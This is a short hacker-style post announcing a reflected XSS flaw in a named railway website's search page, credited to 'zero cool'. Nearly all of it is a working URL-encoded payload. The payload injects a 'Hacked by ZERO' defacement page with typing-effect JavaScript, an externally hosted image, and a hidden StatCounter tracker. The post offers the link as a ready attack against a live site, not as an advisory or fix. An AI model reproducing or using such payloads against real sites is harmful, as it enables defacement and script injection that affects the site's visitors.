non-persistent xss vulnerability in www.pakrail.com found by zero cool.
link
http://www.pakrail.com/search.php?txtsearch=%3E%22%3E%3Chead%3E+%3Ctitle%3EHacked+by+ZERO%3C%2Ftitle%3E+%3C%2Fh1%3E%3CBODY++++BGCOLOR%3D%22%23000000%22++++TEXT%3D%22%23FFFFFF%22+%3E+%3Cbody%3E+%3C%2Fhead%3E+%3Cbr%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Cimg+src%3D%22http://img156.imageshack.us/img156/1594/zeroso.png%22++%3E%3C%2Fcenter%3E+%3Cbr%3E+%3Ch3%3E+%3C%2Fcaption%3E+%3Ccenter%3E%3Ccaption%3E$+HACK%20+$+ME+$+IF%20U%20CAN+$%3C%2Fa%3E%3C%2Fcenter%3E+%3C%2Fcaption%3E+%3Cbr%3E+%3Ccenter%3E+%3Cbody+onLoad%3D%22document.form.input.focus%28%29%3B%22%3E++%3Cbr%3E+%3Cfont+color%3D%22red%22%3E%3Cspan+id%3D%22typing%22%3E+Your+site+is+vulnerable+to+xxs+%3Cbr%3E+Hacked+by+ZERO%3C%2Fspan%3E++%3Cscript+type%3D%22text%2Fjavascript%22%3E++interval+%3D+30%3B+%2F%2F+Interval+in+milliseconds+to+wait+between+characters++if%28document.getElementById%29+{+t+%3D+document.getElementById%28%22typing%22%29%3B+if%28t.innerHTML%29+{+typingBuffer+%3D+%22%22%3B+%2F%2F+buffer+prevents+some+browsers+stripping+spaces+it+%3D+0%3B+mytext+%3D+t.innerHTML%3B+t.innerHTML+%3D+%22%22%3B+typeit%28%29%3B+}+}++function+typeit%28%29+{+mytext+%3D+mytext.replace%28%2F%3C%28[^%3C]%29*%3E%2F%2C+%22%22%29%3B+%2F%2F+Strip+HTML+from+text+if%28it+%3C+mytext.length%29+{+typingBuffer+%2B%3D+mytext.charAt%28it%29%3B+t.innerHTML+%3D+typingBuffer%3B+it%2B%2B%3B+setTimeout%28%22typeit%28%29%22%2C+interval%29%3B+}+}+%3C%2Fscript%3E+%3Cbr%3E+%3C%2Ffont%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Ccaption%3Eyou.got.hacked.by.ZERO...!!!!%3C%2Fa%3E%3C%2Fcenter%3E+%3C!--+Start+of+StatCounter+Code+--%3E+%3Cscript+type%3D%22text%2Fjavascript%22%3E+var+sc_project%3D6474887%3B++var+sc_invisible%3D1%3B++var+sc_security%3D%229181d223%22%3B++%3C%2Fscript%3E++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fwww.statcounter.com%2Fcounter%2Fcounter.js%22%3E%3C%2Fscript%3E%3Cnoscript%3E%3Cdiv+class%3D%22statcounter%22%3E%3Ca+title%3D%22hit+counter%22+href%3D%2 2http%3A%2F%2Fstatcounter.com%2Ffree_hit_counter.html%22+target%3D%22_blank%22%3E%3Cimg+class%3D%22statcounter%22+src%3D%22http%3A%2F%2Fc.statcounter.com%2F6474887%2F0%2F9181d223%2F1%2F%22+alt%3D%22hit+counter%22+%3E%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E+%3C!--+End+of+StatCounter+Code+--%3E%3C%2Fbody%3E+%3C%2Fdiv%3E+%3C%2Fform%3E+%3C%2Fcenter%3E+%3C%2Fbody%3E&x=0&y=0
LINK TO OUR HOME PAGE :


Categories:
vulnerablity